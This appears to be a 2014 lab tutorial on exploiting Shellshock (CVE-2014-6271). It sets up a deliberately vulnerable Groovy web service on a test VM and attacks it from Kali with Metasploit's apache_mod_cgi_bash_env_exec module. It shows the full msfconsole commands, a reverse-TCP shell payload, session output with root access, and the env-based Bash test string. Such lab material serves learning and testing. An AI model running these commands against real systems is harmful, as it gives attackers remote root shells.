[Toolkit] Simple Web Service - SimpleHttp.groovy

Preface
Here I am going to introduce a toolkit to help us to run Metasploit on CVE-2014-6271 (Shellshock):

NU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.

Before we step forwrd, please make sure you have Kali Linux (download) ready and prepare one Linux/Unix VM OS as an exploitable target. Because we will run the toolkit introduced here inside exploitable target, so make sure the exploitable target has below environment:

* JRE/JDK 1.7+ (Download)
* Groovy 2.2+ (Download)
* Python 2.6+ (Download)

Toolkit Usage
Toolkit - SimpleHttp.groovy is written in groovy script, so you can open it and edit it. Please edit it for configuration setting before using it:

view plaincopy to clipboardprint?

1. ...  
2. /*************************************************************** 
3. * - Configuration 
4. ***************************************************************/  
5. def useIPv6=false  
6. int listenPort=80  
7. int backLog=0  
8. def listenNIF="eth0"  
9. def listenAddr=""  
10. ...  

From configuration, you can:

* useIPv6: True to bind IPv6 address; False to bind IPv4 address.
* listenPort: Binding port
* backLog: Socket backlog
* listenNIF: Force service to bind IP address from given network interface.
* listenAddr: Binding to specific IP address. This will have higher priority than listenNIF.

Start Http Service At Exploitable Target
According to CVE-2014-6271, this CVE will only take effect on Bash under specific version. However, through this toolkit, this limitation is no longer a problem. This toolkit will be always exploitable because of customized code. So our first step is to start the Http Service with this toolkit.

This toolkit will require Flib.jar library. So please make sure it exist in the libs folder (Under execution work space). Then start the service with below command:

# groovy -cp ./libs/* SimpleHttp.groovy # Put necessary libraries under ./libs/
[Info] Listen on NIF=eth0: /172.16.58.50

Then you can type in http://172.16.58.50/bash into the browser to make sure it works:

(If you can't access the URL correctly, please check the firewall setting.)

So far, our exploitable target is ready to be exploit. Next step is to use Metasploit to do the testing.

Run CVE-2014-6271 Through Metasploit
Now let's move to Kali Linux. Please key-in "msfconsole" in the terminal console to enter the interface of MSF:

# msfconsole
...
msf > // Now we are in MSF interface

Let's search CVE-2014-6271:

msf> search cve:2014-6271
...
exploit/multi/http/apache_mod_cgi_bash_env_exec 2014-09-24 good Apache mod_cgi Bash Environment Variable Code Injection
...

Here we are going to exploit apache mod_cgi. So let use it:

msf> use exploit/multi/http/apache_mod_cgi_bash_env_exec
msf exploit(apache_mod_cgi_bash_env_exec) > // Now we are using exploit apache_mod_cgi_bash_env_exec

Let's check how to use this exploit:

msf exploit(apache_mod_cgi_bash_env_exec) > show options

For all required settings which are empty, we need fill them with proper value according to our exploitable target:

msf exploit(apache_mod_cgi_bash_env_exec) > set VHOST 172.16.58.50
msf exploit(apache_mod_cgi_bash_env_exec) > set RHOST 172.16.58.50
msf exploit(apache_mod_cgi_bash_env_exec) > set TARGETURI /bash
msf exploit(apache_mod_cgi_bash_env_exec) > show options

So now every required options are ready. Next is to check if the exploitable target is exploitable:

msf exploit(apache_mod_cgi_bash_env_exec) > check
[+] 172.16.58.50:80 - The target is vulnerable.

Let's move back to the console of toolkit and check what kinds of data is sent to us:

(The highlight part is the exploit code to attack target with cve-2014-6271)

Finally, we are going to exploit exploitable target and build-up a reverse-shell to control it:

msf exploit(apache_mod_cgi_bash_env_exec) > set payload linux/x86/shell_reverse_tcp # Using reverse shell payload
payload => linux/x86/shell_reverse_tcp
msf exploit(apache_mod_cgi_bash_env_exec) > exploit // Start attack target

[*] Started reverse handler on 172.16.58.1:4444
[*] Command shell session 1 opened (172.16.58.1:4444 -> 172.16.58.50:43879) at 2014-10-07 06:06:42 -0700
[*] Command Stager progress - 100.61% done (822/817 bytes)
// Now we are ready to give command to exploitable target!
id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 // The shell is running with root privilege.
^C // Ctrl+C to terminate the session/reverse shell
Abort session 1? [y/N] y

[*] 172.16.58.50 - Command shell session 1 closed. Reason: User exit

Supplement
* Rapid7 - Dhclient Bash Environment Variable Injection
* Rapid7 - OS X VMWare Fusion Privilege Escalation v...ash Environment Code Injection
* Rapid7 - DHCP Client Bash Environment Variable Code Injection
* Rapid7 - Pure-FTPd External Authentication Bash En...onment Variable Code Injection
* Rapid7 - Apache mod_cgi Bash Environment Variable RCE Scanner
* Rapid7 - Apache mod_cgi Bash Environment Variable Code Injection
* Wiki - Shellshock

This original form of the vulnerability involves a specially crafted environment variable containing an exported function definition, followed by arbitrary commands. Bash incorrectly executes the trailing commands when it imports the function. The vulnerability can be tested with the following command:

view plaincopy to clipboardprint?

1. env x='() { :;}; echo vulnerable' bash -c "echo this is a test"